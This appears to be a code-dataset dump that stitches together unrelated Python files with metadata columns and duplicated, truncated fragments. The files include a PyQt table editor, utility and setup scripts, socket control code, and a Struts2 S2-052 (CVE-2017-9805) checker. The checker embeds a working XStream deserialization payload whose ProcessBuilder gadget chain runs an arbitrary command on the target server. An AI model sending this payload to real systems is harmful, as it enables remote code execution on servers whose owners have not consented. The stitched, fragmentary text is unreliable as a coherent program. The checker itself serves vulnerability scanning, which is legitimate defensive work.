database_entry_id, new_account=new_item_data)
# Update the balance of the two accounts involved,
# according to the result amount
balances.update_balances_with_new_result(
previous_account, - previous_amount)
balances.update_balances_with_new_result(
new_item_data, previous_amount)
# -------------- Strategy --------------------
elif columnselected_name == self.tr("Strategy"):
# The strategy has to be an existing one
previous_strategy = results.get_result_strategy_by_id(
database_entry_id)
all_strategies = [s[0] for s in strategies.get_all_strategies()]
if new_item_data not in all_strategies:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("The strategy has to be an existing one. \nAdd it first manually"))
error_mssg.exec_()
# Reset strategy to previous one
self.updatingdata_flag = True
new_item.setData(0, previous_strategy)
self.updatingdata_flag = False
else:
# The data is good
# Change the result on the results table of the db
results.updateResult(
database_entry_id, newstrategy=new_item_data)
# Update the pnl of the two strategies involved,
# according to the result amount
strategies.update_strategies_with_new_result(
previous_strategy, - previous_amount)
strategies.update_strategies_with_new_result(
new_item_data, previous_amount)
# -------------- Amount --------------------
elif columnselected_name == self.tr("Amount"):
# The amount has to be an integer
try:
new_item_data = int(new_item_data)
# Change the result on the results table of the db
results.update_result(
database_entry_id, new_amount=new_item_data)
# Update the balances and strategies with the difference
# between the old and the new result
diff_betweeen_results = new_item_data - previous_amount
account_involved = results.get_result_account_by_id(
database_entry_id)
strategy_involved = results.get_result_strategy_by_id(
database_entry_id)
balances.update_balances_with_new_result(
account_involved, diff_betweeen_results)
strategies.update_strategies_with_new_result(
strategy_involved, diff_betweeen_results)
except Exception:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("Has to be an integer"))
error_mssg.exec_()
# Reset to previous amount
previous_amount = results.get_result_amount_by_id(
database_entry_id)
self.updatingdata_flag = True
new_item.setData(0, previous_amount)
self.updatingdata_flag = False
# -------------- Description --------------------
elif columnselected_name == self.tr("Description"):
# A description can be any data. So no checks
results.update_result(
database_entry_id, new_description=new_item_data)
class LineRemoved(QObject):
lineRemoved = pyqtSignal()
| <filename>portfolio/gui/tabresults/righttable.py
#!/usr/bin/python3
from datetime import datetime
from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox
from PyQt5.QtGui import QCursor
from PyQt5.QtCore import Qt, pyqtSignal, QObject
from portfolio.db.fdbhandler import results, strategies, balances
def updatingdata(func):
"""
Decorator to flag self.updatingdata_flag whenever a function
that edits data without user intervention is being run
"""
def wrapper(self, *args, **kwargs):
self.updatingdata_flag = True
func(self, *args, **kwargs)
self.updatingdata_flag = False
return wrapper
class RightTable(QTableWidget):
"""
Table dynamically showing results
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Custom Menu
self.setContextMenuPolicy(Qt.CustomContextMenu)
self.customContextMenuRequested.connect(self.showMenu)
# A signal that will be emited whenever a line is removed
self.lineremoved = LineRemoved()
# UI Tweaks
self.verticalHeader().hide()
self.setSortingEnabled(True)
self.setHorizontalHeaderLabels(
["id", self.tr("Date"), self.tr("Account"), self.tr("Strategy"), self.tr("Amount")])
# When edited, change the data on the database too
self.cellChanged.connect(self.changeCellOnDatabase)
# A flag to prevent changeCellOnDatabase execution when needed
self.updatingdata_flag = True
# Initialization: show all transactions
self.setData(datetime(1980, 1, 1), datetime.today(), "All", "All")
@updatingdata
def setData(self, startdate, enddate, strategy, account):
"""
Asks the database for results data within certain parameters,
then shows that data on the table
"""
# Clear table
self.clear()
self.setHorizontalHeaderLabels(
["id", self.tr("Date"), self.tr("Account"), self.tr("Strategy"), self.tr("Amount"), self.tr("Description")])
# Get desired data from db
results_to_show = results.get_results_from_query(
start_date=startdate, end_date=enddate, strategy=strategy, account=account)
# If the data is empty, we are done
if len(results_to_show) == 0:
self.setRowCount(0)
return
# Resize table
self.setRowCount(len(results_to_show))
self.setColumnCount(len(results_to_show[0]))
# Change content
for rownum, row in enumerate(results_to_show):
for colnum, data in enumerate(row):
item = QTableWidgetItem() # Item that will be inserted
if colnum == 0:
# Ids can't be editable
item.setFlags(Qt.ItemIsSelectable)
elif colnum == 1:
# Change format to display date better
data = datetime.fromtimestamp(data).strftime("%d-%m-%Y")
# Data is now formatted, we can write it on table
item.setData(0, data)
self.setItem(rownum, colnum, item)
def showMenu(self, event):
"""
Custom Menu to show when an item is right-clicked
Options:
- Remove Line: removes line from table and database
"""
menu = QMenu()
# Actions
remove_action = menu.addAction(self.tr("Remove Line"))
# Getting action selected by user
action = menu.exec_(QCursor.pos())
# Act accordingly
if action == remove_action:
self.removeSelection()
self.lineremoved.lineRemoved.emit()
@updatingdata
def removeSelection(self):
"""
Removes the entire row of every selected item,
and then does the same on the databse
"""
# Getting selected indexes, and their corresponding ids
# from the database
selected_indexes_table, selected_ids = [], []
for index in self.selectedIndexes():
index = index.row() # Row number
if index not in selected_indexes_table: # Avoid duplicates
selected_indexes_table.append(index)
selected_ids.append(int(self.item(index, 0).text()))
# Removing the rows from the table and the database
for index, id_db in zip(selected_indexes_table, selected_ids):
results.delete_result(id_db)
self.removeRow(index)
print("Removed rows with ids on db : ", selected_ids,
"\n & ids on table: ", selected_indexes_table)
def changeCellOnDatabase(self, row, column):
"""
When a Table Item is edited by the user,
we want to check if it fits the type
and edit it on the database too
"""
if self.updatingdata_flag is True:
return
# The data is being modified internally (not by the user)
# so no errors assumed
new_item = self.item(row, column)
new_item_data = new_item.text()
database_entry_id = self.item(row, 0).text()
previous_amount = results.getResultAmountById(
database_entry_id) # Useful for balance adjustments later
columnselected_name = self.horizontalHeaderItem(column).text()
# Depending on from which column the item is, we check the data
# proposed differently
# Check which part of the transaction has been edited, and accting accordingly
# -------------- id --------------------
if columnselected_name == self.tr("Id"):
# Ids can't be edited
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(self.tr("Ids can't be edited"))
error_mssg.exec_()
# -------------- Date --------------------
elif columnselected_name == self.tr("Date"):
# The new text has to be a date
try:
new_date = datetime.strptime(new_item_data, "%d-%m-%Y")
results.update_result(
database_entry_id, new_date=new_date.timestamp())
except ValueError:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("Has to be a date in format dd-mm-yyyy"))
error_mssg.exec_()
# Reset date to previous one
previous_date_timestamp = results.get_result_date_by_id(
database_entry_id)
previous_date_text = datetime.fromtimestamp(
previous_date_timestamp).strftime("%d-%m-%Y")
self.updatingdata_flag = True
new_item.setData(0, previous_date_text)
self.updatingdata_flag = False
# -------------- Account --------------------
elif columnselected_name == self.tr("Account"):
# The account has to be an existing one
all_accounts = [a[0] for a in balances.get_all_accounts()]
previous_account = results.get_result_account_by_id(
database_entry_id)
if new_item_data not in all_accounts:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("The account has to be an existing one. \nAdd it first manually"))
error_mssg.exec_()
# Reset strategy to previous one
self.updatingdata_flag = True
new_item.setData(0, previous_account)
self.updatingdata_flag = False
else:
# The data is good
# Change the result on the results table on the db
results.update_result(
database_entry_id, new_account=new_item_data)
# Update the balance of the two accounts involved,
# according to the result amount
balances.update_balances_with_new_result(
previous_account, - previous_amount)
balances.update_balances_with_new_result(
new_item_data, previous_amount)
# -------------- Strategy --------------------
elif columnselected_name == self.tr("Strategy"):
# The strategy has to be an existing one
previous_strategy = results.get_result_strategy_by_id(
database_entry_id)
all_strategies = [s[0] for s in strategies.get_all_strategies()]
if new_item_data not in all_strategies:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("The strategy has to be an existing one. \nAdd it first manually"))
error_mssg.exec_()
# Reset strategy to previous one
self.updatingdata_flag = True
new_item.setData(0, previous_strategy)
self.updatingdata_flag = False
else:
# The data is good
# Change the result on the results table of the db
results.updateResult(
database_entry_id, newstrategy=new_item_data)
# Update the pnl of the two strategies involved,
# according to the result amount
strategies.update_strategies_with_new_result(
previous_strategy, - previous_amount)
strategies.update_strategies_with_new_result(
new_item_data, previous_amount)
# -------------- Amount --------------------
elif columnselected_name == self.tr("Amount"):
# The amount has to be an integer
try:
new_item_data = int(new_item_data)
# Change the result on the results table of the db
results.update_result(
database_entry_id, new_amount=new_item_data)
# Update the balances and strategies with the difference
# between the old and the new result
diff_betweeen_results = new_item_data - previous_amount
account_involved = results.get_result_account_by_id(
database_entry_id)
strategy_involved = results.get_result_strategy_by_id(
database_entry_id)
balances.update_balances_with_new_result(
account_involved, diff_betweeen_results)
strategies.update_strategies_with_new_result(
strategy_involved, diff_betweeen_results)
except Exception:
error_mssg = QMessageBox()
error_mssg.setIcon(QMessageBox.Warning)
error_mssg.setText(
self.tr("Has to be an integer"))
error_mssg.exec_()
# Reset to previous amount
previous_amount = results.get_result_amount_by_id(
database_entry_id)
self.updatingdata_flag = True
new_item.setData(0, previous_amount)
self.updatingdata_flag = False
# -------------- Description --------------------
elif columnselected_name == self.tr("Description"):
# A description can be any data. So no checks
results.update_result(
database_entry_id, new_description=new_item_data)
class LineRemoved(QObject):
lineRemoved = pyqtSignal()
| en | 0.812611 | #!/usr/bin/python3 Decorator to flag self.updatingdata_flag whenever a function that edits data without user intervention is being run Table dynamically showing results # Custom Menu # A signal that will be emited whenever a line is removed # UI Tweaks # When edited, change the data on the database too # A flag to prevent changeCellOnDatabase execution when needed # Initialization: show all transactions Asks the database for results data within certain parameters, then shows that data on the table # Clear table # Get desired data from db # If the data is empty, we are done # Resize table # Change content # Item that will be inserted # Ids can't be editable # Change format to display date better # Data is now formatted, we can write it on table Custom Menu to show when an item is right-clicked Options: - Remove Line: removes line from table and database # Actions # Getting action selected by user # Act accordingly Removes the entire row of every selected item, and then does the same on the databse # Getting selected indexes, and their corresponding ids # from the database # Row number # Avoid duplicates # Removing the rows from the table and the database When a Table Item is edited by the user, we want to check if it fits the type and edit it on the database too # The data is being modified internally (not by the user) # so no errors assumed # Useful for balance adjustments later # Depending on from which column the item is, we check the data # proposed differently # Check which part of the transaction has been edited, and accting accordingly # -------------- id -------------------- # Ids can't be edited # -------------- Date -------------------- # The new text has to be a date # Reset date to previous one # -------------- Account -------------------- # The account has to be an existing one # Reset strategy to previous one # The data is good # Change the result on the results table on the db # Update the balance of the two accounts involved, # according to the result amount # -------------- Strategy -------------------- # The strategy has to be an existing one # Reset strategy to previous one # The data is good # Change the result on the results table of the db # Update the pnl of the two strategies involved, # according to the result amount # -------------- Amount -------------------- # The amount has to be an integer # Change the result on the results table of the db # Update the balances and strategies with the difference # between the old and the new result # Reset to previous amount # -------------- Description -------------------- # A description can be any data. So no checks | 2.283611 | 2 |
Day5/overlap_result.py | d4yvie/advent_of_code_2021 | 0 | 8510 | <filename>Day5/overlap_result.py<gh_stars>0
class OverlapResult:
def __init__(self, overlap_map: dict[tuple[float, float], int]):
self._overlap_map = overlap_map
self._overlaps = overlap_map_to_overlaps(overlap_map)
@property
def overlaps(self) -> int:
return self._overlaps
@property
def overlap_map(self) -> dict[tuple[float, float], int]:
return self._overlap_map
def overlap_map_to_overlaps(overlap_map: dict[tuple[float, float], int], minimal_overlap=2) -> int:
return len(list(filter(lambda val: val >= minimal_overlap, overlap_map.values())))
| <filename>Day5/overlap_result.py<gh_stars>0
class OverlapResult:
def __init__(self, overlap_map: dict[tuple[float, float], int]):
self._overlap_map = overlap_map
self._overlaps = overlap_map_to_overlaps(overlap_map)
@property
def overlaps(self) -> int:
return self._overlaps
@property
def overlap_map(self) -> dict[tuple[float, float], int]:
return self._overlap_map
def overlap_map_to_overlaps(overlap_map: dict[tuple[float, float], int], minimal_overlap=2) -> int:
return len(list(filter(lambda val: val >= minimal_overlap, overlap_map.values())))
| none | 1 | 2.863151 | 3 |
|
setup.py | NikolaiT/proxychecker | 1 | 8511 | <filename>setup.py
#!/usr/bin/env python
from distutils.core import setup
VERSION = "0.0.1"
setup(
author='<NAME>',
name = "proxychecker",
version = VERSION,
description = "A Python proxychecker module that makes use of socks",
url = "http://incolumitas.com",
license = "BSD",
author_email = "<EMAIL>",
keywords = ["socks", "proxy", "proxychecker"],
py_modules = ['proxychecker', 'sockshandler', 'socks']
)
| <filename>setup.py
#!/usr/bin/env python
from distutils.core import setup
VERSION = "0.0.1"
setup(
author='<NAME>',
name = "proxychecker",
version = VERSION,
description = "A Python proxychecker module that makes use of socks",
url = "http://incolumitas.com",
license = "BSD",
author_email = "<EMAIL>",
keywords = ["socks", "proxy", "proxychecker"],
py_modules = ['proxychecker', 'sockshandler', 'socks']
)
| ru | 0.26433 | #!/usr/bin/env python | 1.237086 | 1 |
charlotte/charlotte.py | puiterwijk/charlotte | 5 | 8512 | <filename>charlotte/charlotte.py
class Config:
def __init__(self, config_file_name):
self.config_file_name = config_file_name
| <filename>charlotte/charlotte.py
class Config:
def __init__(self, config_file_name):
self.config_file_name = config_file_name
| none | 1 | 1.768943 | 2 |
|
python/app/plugins/http/Struts2/S2_052.py | taomujian/linbing | 351 | 8513 | #!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.encode import base64encode
from app.lib.utils.common import get_capta, get_useragent
class S2_052_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'S2-052漏洞,又名CVE-2017-9805漏洞',
'description': 'Struts2 Remote Code Execution Vulnerability, Struts 2.1.6 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12',
'date': '2017-09-05',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.capta = get_capta()
self.headers = {
'User-Agent': get_useragent(),
'Content-Type': "application/xml",
}
self.payload ='''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{cmd}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
self.check_payload = self.payload.format(cmd = '<string>calc</string>')
check_req = request.post(self.url, headers = self.headers, data = self.check_payload)
if check_req.status_code == 500 and 'java.security.Provider$Service' in check_req.text:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
S2_052 = S2_052_BaseVerify('http://127.0.0.1:8088/struts2_rest_showcase_war_exploded/orders/3') | #!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.encode import base64encode
from app.lib.utils.common import get_capta, get_useragent
class S2_052_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'S2-052漏洞,又名CVE-2017-9805漏洞',
'description': 'Struts2 Remote Code Execution Vulnerability, Struts 2.1.6 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12',
'date': '2017-09-05',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.capta = get_capta()
self.headers = {
'User-Agent': get_useragent(),
'Content-Type': "application/xml",
}
self.payload ='''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{cmd}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
self.check_payload = self.payload.format(cmd = '<string>calc</string>')
check_req = request.post(self.url, headers = self.headers, data = self.check_payload)
if check_req.status_code == 500 and 'java.security.Provider$Service' in check_req.text:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
S2_052 = S2_052_BaseVerify('http://127.0.0.1:8088/struts2_rest_showcase_war_exploded/orders/3') | en | 0.190416 | #!/usr/bin/env python3 <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> {cmd} </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> 检测是否存在漏洞 :param: :return bool True or False: 是否存在漏洞 | 2.387362 | 2 |
UPD/extension/utils.py | RIDCorix/UPD | 0 | 8514 | <reponame>RIDCorix/UPD<gh_stars>0
import sys
# def get_tools():
# manager = PluginManager()
# manager.setPluginPlaces(["plugins/file_cabinet"])
# manager.collectPlugins()
# return [plugin.plugin_object for plugin in manager.getAllPlugins()]
def get_tools():
import importlib
tools = ['file_cabinet', 'us', 'automator', 'main']
tool_installation_dir1 = 'C:/Users/User/UPD/plugins'
tool_installation_dir2 = '/Users/mac/UPD/plugins'
sys.path.append(tool_installation_dir1)
sys.path.append(tool_installation_dir2)
tool_instances = []
auto_load_modules = ['tasks', 'ui', 'models', 'renderers']
for tool in tools:
tool_instances.append(importlib.import_module('.'.join([tool, 'tool'])).tool)
for module in auto_load_modules:
try:
importlib.import_module('.'.join([tool, module]))
except:
pass
return tool_instances
| import sys
# def get_tools():
# manager = PluginManager()
# manager.setPluginPlaces(["plugins/file_cabinet"])
# manager.collectPlugins()
# return [plugin.plugin_object for plugin in manager.getAllPlugins()]
def get_tools():
import importlib
tools = ['file_cabinet', 'us', 'automator', 'main']
tool_installation_dir1 = 'C:/Users/User/UPD/plugins'
tool_installation_dir2 = '/Users/mac/UPD/plugins'
sys.path.append(tool_installation_dir1)
sys.path.append(tool_installation_dir2)
tool_instances = []
auto_load_modules = ['tasks', 'ui', 'models', 'renderers']
for tool in tools:
tool_instances.append(importlib.import_module('.'.join([tool, 'tool'])).tool)
for module in auto_load_modules:
try:
importlib.import_module('.'.join([tool, module]))
except:
pass
return tool_instances | en | 0.339047 | # def get_tools(): # manager = PluginManager() # manager.setPluginPlaces(["plugins/file_cabinet"]) # manager.collectPlugins() # return [plugin.plugin_object for plugin in manager.getAllPlugins()] | 2.255539 | 2 |
sbin/preload_findit_coverage_2.py | cariaso/metapub | 28 | 8515 | <filename>sbin/preload_findit_coverage_2.py
from __future__ import absolute_import, print_function, unicode_literals
# "preload" for FindIt #2: iterate over same journal list, but actually
# load a PubMedArticle object on each PMID. (no list output created)
from metapub import FindIt, PubMedFetcher
from metapub.findit.dances import the_doi_2step
from config import JOURNAL_ISOABBR_LIST_FILENAME
fetch = PubMedFetcher()
def get_sample_pmids_for_journal(jrnl, years=None, max_pmids=3):
samples = []
if years is None:
pmids = fetch.pmids_for_query(journal=jrnl)
idx = 0
while idx < len(pmids) and idx < max_pmids:
samples.append(pmids[idx])
idx += 1
else:
for year in years:
pmids = fetch.pmids_for_query(journal=jrnl, year=year)
if len(pmids) < 1:
continue
samples.append(pmids[0])
return samples
def main():
jrnls = sorted(open(JOURNAL_ISOABBR_LIST_FILENAME).read().split('\n'))
for jrnl in jrnls:
jrnl = jrnl.strip()
if jrnl == '':
continue
years = ['1975', '1980', '1990', '2002', '2013']
num_desired = len(years)
pmids = get_sample_pmids_for_journal(jrnl, years=years)
if len(pmids) < num_desired:
pmids = pmids + get_sample_pmids_for_journal(jrnl, max_pmids=num_desired-len(pmids))
print('[%s] Sample pmids: %r' % (jrnl, pmids))
for pmid in pmids:
pma = fetch.article_by_pmid(pmid)
print(' ', pma.pmid, pma.title)
if __name__ == '__main__':
main()
| <filename>sbin/preload_findit_coverage_2.py
from __future__ import absolute_import, print_function, unicode_literals
# "preload" for FindIt #2: iterate over same journal list, but actually
# load a PubMedArticle object on each PMID. (no list output created)
from metapub import FindIt, PubMedFetcher
from metapub.findit.dances import the_doi_2step
from config import JOURNAL_ISOABBR_LIST_FILENAME
fetch = PubMedFetcher()
def get_sample_pmids_for_journal(jrnl, years=None, max_pmids=3):
samples = []
if years is None:
pmids = fetch.pmids_for_query(journal=jrnl)
idx = 0
while idx < len(pmids) and idx < max_pmids:
samples.append(pmids[idx])
idx += 1
else:
for year in years:
pmids = fetch.pmids_for_query(journal=jrnl, year=year)
if len(pmids) < 1:
continue
samples.append(pmids[0])
return samples
def main():
jrnls = sorted(open(JOURNAL_ISOABBR_LIST_FILENAME).read().split('\n'))
for jrnl in jrnls:
jrnl = jrnl.strip()
if jrnl == '':
continue
years = ['1975', '1980', '1990', '2002', '2013']
num_desired = len(years)
pmids = get_sample_pmids_for_journal(jrnl, years=years)
if len(pmids) < num_desired:
pmids = pmids + get_sample_pmids_for_journal(jrnl, max_pmids=num_desired-len(pmids))
print('[%s] Sample pmids: %r' % (jrnl, pmids))
for pmid in pmids:
pma = fetch.article_by_pmid(pmid)
print(' ', pma.pmid, pma.title)
if __name__ == '__main__':
main()
| en | 0.614009 | # "preload" for FindIt #2: iterate over same journal list, but actually # load a PubMedArticle object on each PMID. (no list output created) | 2.566462 | 3 |
sgcache/control.py | vfxetc/sgcache | 13 | 8516 | <gh_stars>10-100
from __future__ import absolute_import
from select import select
import errno
import functools
import itertools
import json
import logging
import os
import socket
import threading
import time
import traceback
log = logging.getLogger(__name__)
from .utils import makedirs, unlink
class TimeOut(Exception):
pass
base_handlers = {
'ping': lambda control, msg: {'type': 'pong', 'pid': os.getpid()}
}
def _coerce_msg(type=None, **msg):
if type:
if isinstance(type, basestring):
msg['type'] = type
return msg
elif msg:
raise ValueError('cannot specify dict message and kwargs')
else:
msg = dict(type)
if 'type' not in msg:
raise ValueError('message requires type')
return msg
class ControlClient(object):
handlers = base_handlers.copy()
def __init__(self, addr=None, sock=None, server=None):
self.addr = addr
self.sock = sock
self.server = server
self._line_buffer = ''
self._message_buffer = []
self._handler_reply_ids = None
self._session_generator = itertools.count(1)
if sock is None:
self.connect()
def connect(self):
# This is indempodent.
if self.sock is not None:
return
if self.addr is None:
return
if isinstance(self.addr, basestring):
self.sock = socket.socket(socket.AF_UNIX)
else:
self.sock = socket.socket(socket.AF_INET)
self.sock.connect(self.addr)
return True
def close(self):
if self.sock:
self.sock.close()
self.sock = None
def _readline(self, timeout=None):
if not self.sock:
return
if timeout:
end_time = time.time() + timeout
buffer_ = self._line_buffer
while True:
r, _, _ = select([self.sock], [], [], max(0, end_time - time.time()) if timeout else None)
if not r:
raise TimeOut()
new = self.sock.recv(4096)
if not new:
self.sock = None
self._line_buffer = ''
return
buffer_ += new
if '\n' in buffer_:
line, buffer_ = buffer_.split('\n', 1)
self._line_buffer = buffer_
return line
def recv(self, timeout=None):
try:
return self._message_buffer.pop(0)
except IndexError:
pass
for attempt_num in (0, 1):
self.connect()
try:
line = self._readline(timeout)
except socket.error as e:
if attempt_num:
raise
if line:
try:
return json.loads(line)
except:
self.send('error', message='malformed message')
self.close()
return
if attempt_num:
return
def recv_for(self, wait_id, timeout=None):
for i in xrange(len(self._message_buffer)):
msg = self._message_buffer[i]
if msg.get('for') == wait_id:
self._message_buffer.pop(i)
return msg
while True:
msg = self.recv(timeout)
if not msg:
return
if msg.get('for') == wait_id:
return msg
self._message_buffer.append(msg)
def send(self, *args, **kwargs):
msg = _coerce_msg(*args, **kwargs)
wait_id = msg.get('wait')
if wait_id is True:
wait_id = msg['wait'] = next(self._session_generator)
encoded = json.dumps(msg)
# Track what has been sent automatically.
if wait_id is not None and self._handler_reply_ids is not None:
self._handler_reply_ids.add(wait_id)
# Attempt to reconnect a couple times when sending this.
for attempt_num in (0, 1):
self.connect()
try:
self.sock.send(encoded + '\n')
except socket.error as e:
if attempt_num:
raise
return wait_id
def reply_to(self, original, *args, **kwargs):
wait_id = original.get('wait')
if wait_id is None:
raise ValueError('original message has no session')
msg = _coerce_msg(*args, **kwargs)
msg['for'] = wait_id
self.send(msg)
def send_and_recv(self, type, **kwargs):
timeout = kwargs.pop('timeout')
msg = _coerce_msg(type, **kwargs)
msg['wait'] = True
wait_id = self.send(msg)
return self.recv_for(wait_id, timeout)
def ping(self, timeout=None):
return self.send_and_recv('ping', pid=os.getpid(), timeout=timeout)
def loop(self, async=False):
if async:
thread = threading.Thread(target=self.loop)
thread.daemon = True
thread.start()
return thread
while True:
msg = self.recv()
if not msg:
return
type_ = msg.get('type')
wait_id = msg.get('wait')
func = self.handlers.get(type_)
if func is None and self.server:
func = self.server.handlers.get(type_)
if func is None:
log.warning('unknown message type %r' % type_)
self.reply_to(msg, 'error', message='unknown message type %r' % type_)
continue
if self.server and self.server.name:
log.info('%s handling %s' % (self.server.name, type_))
else:
log.info('handling %s' % type_)
self._handler_reply_ids = set()
try:
res = func(self, msg)
except Exception as e:
self.reply_to(msg, 'error', message='unhandled exception %s' % e)
continue
# If the handler replied, then we are done.
if res is None and wait_id is None or wait_id in self._handler_reply_ids:
continue
res = res.copy() if isinstance(res, dict) and 'type' in res else {'type': 'result', 'value': res}
if wait_id is not None:
res['for'] = wait_id
self.send(res)
class ControlServer(object):
def __init__(self, addr, name=None):
self.addr = addr
self.name = name
self.handlers = base_handlers.copy()
if isinstance(self.addr, basestring):
self.sock = socket.socket(socket.AF_UNIX)
if os.path.exists(self.addr):
# TODO: Try connecting to it before destroying it.
unlink(self.addr)
makedirs(os.path.dirname(self.addr))
else:
self.sock = socket.socket(socket.AF_INET)
self.sock.bind(self.addr)
self.sock.listen(5)
def register(self, func=None, **kwargs):
if func is None:
return functools(self.register(**kwargs))
self.handlers[kwargs.get('name') or func.__name__] = func
def loop(self, async=False):
if async:
thread = threading.Thread(target=self.loop)
thread.daemon = True
thread.start()
return thread
while True:
try:
client_sock, addr = self.sock.accept()
except socket.timeout:
continue
client = ControlClient(sock=client_sock, server=self)
client.loop(async=True)
| from __future__ import absolute_import
from select import select
import errno
import functools
import itertools
import json
import logging
import os
import socket
import threading
import time
import traceback
log = logging.getLogger(__name__)
from .utils import makedirs, unlink
class TimeOut(Exception):
pass
base_handlers = {
'ping': lambda control, msg: {'type': 'pong', 'pid': os.getpid()}
}
def _coerce_msg(type=None, **msg):
if type:
if isinstance(type, basestring):
msg['type'] = type
return msg
elif msg:
raise ValueError('cannot specify dict message and kwargs')
else:
msg = dict(type)
if 'type' not in msg:
raise ValueError('message requires type')
return msg
class ControlClient(object):
